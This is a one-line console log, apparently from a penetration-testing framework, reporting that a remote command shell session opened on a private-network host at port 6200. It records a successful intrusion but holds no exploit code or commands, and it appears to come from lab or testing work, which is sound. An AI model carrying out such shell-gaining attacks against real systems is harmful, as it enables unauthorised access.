[*] Command shell session 1 opened (192.168.0.150:38079 -> 192.168.0.160:6200) at 2022-06-30 17:41:05 +0800